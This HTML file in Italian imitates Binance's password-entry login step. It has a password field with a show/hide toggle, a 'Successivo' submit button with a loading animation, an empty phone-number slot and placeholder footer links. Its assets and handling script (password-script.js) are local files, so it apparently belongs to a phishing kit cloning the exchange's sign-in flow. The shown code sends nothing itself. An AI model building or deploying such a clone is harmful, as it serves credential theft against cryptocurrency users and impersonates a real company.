
<!DOCTYPE html>
<html lang="it">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Binance - Inserisci la tua password</title>
    <link rel="stylesheet" href="password-style.css">
</head>
<body>
    <div class="container">
        <div class="login-container">
            <div class="logo">
                <img src="./logo.png" alt="Binance" class="logo-image">
            </div>
            
            <h1 class="title">Inserisci la tua password</h1>
            
            <div class="phone-number"></div>
            
            <form class="login-form">
                <div class="form-group">
                    <label for="password" class="form-label">Password</label>
                    <div class="password-input-container">
                        <input 
                            type="password" 
                            id="password" 
                            class="form-input"
                            placeholder=""
                        >
                        <button type="button" class="toggle-password" id="togglePassword">
                            <span class="toggle-icon">
                                <!-- Occhio aperto (visibile) -->
                                <svg id="eyeOpen" xmlns="http://www.w3.org/2000/svg" width="20" height="20" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon-eye" viewBox="0 0 24 24" style="display:none;">
                                    <path d="M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8z"/>
                                    <circle cx="12" cy="12" r="3"/>
                                </svg>
                                <!-- Occhio sbarrato (nascosto) -->
                                <svg id="eyeClosed" xmlns="http://www.w3.org/2000/svg" width="20" height="20" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon-eye-off" viewBox="0 0 24 24">
                                    <path d="M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8z"/>
                                    <circle cx="12" cy="12" r="3"/>
                                    <line x1="1" y1="1" x2="23" y2="23"/>
                                </svg>
                            </span>
                        </button>
                    </div>
                </div>
                
                <button type="submit" class="submit-button">
                    <span class="button-text">Successivo</span>
                    <div class="loading-animation" style="display: none;">
                        <div class="loading-bar"></div>
                        <div class="loading-bar"></div>
                        <div class="loading-bar"></div>
                        <div class="loading-bar"></div>
                        <div class="loading-bar"></div>
                    </div>
                </button>
            </form>
            
            <div class="forgot-password">
                <a href="#" class="forgot-password-link">Hai dimenticato la password?</a>
            </div>
        </div>
    </div>
    
    <footer class="footer">
        <div class="footer-content">
            <div class="footer-links">
                <span class="footer-language">
                    <svg class="globe-icon" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                        <circle cx="12" cy="12" r="10"/>
                        <line x1="2" y1="12" x2="22" y2="12"/>
                        <path d="M12 2a15.3 15.3 0 0 1 4 10 15.3 15.3 0 0 1-4 10 15.3 15.3 0 0 1-4-10 15.3 15.3 0 0 1 4-10z"/>
                    </svg>
                    Italiano
                </span>
                <a href="#" class="footer-link">Cookie</a>
                <a href="#" class="footer-link">Termini</a>
                <a href="#" class="footer-link">Privacy</a>
            </div>
        </div>
    </footer>
    
    <script src="password-script.js"></script>
</body>
</html>
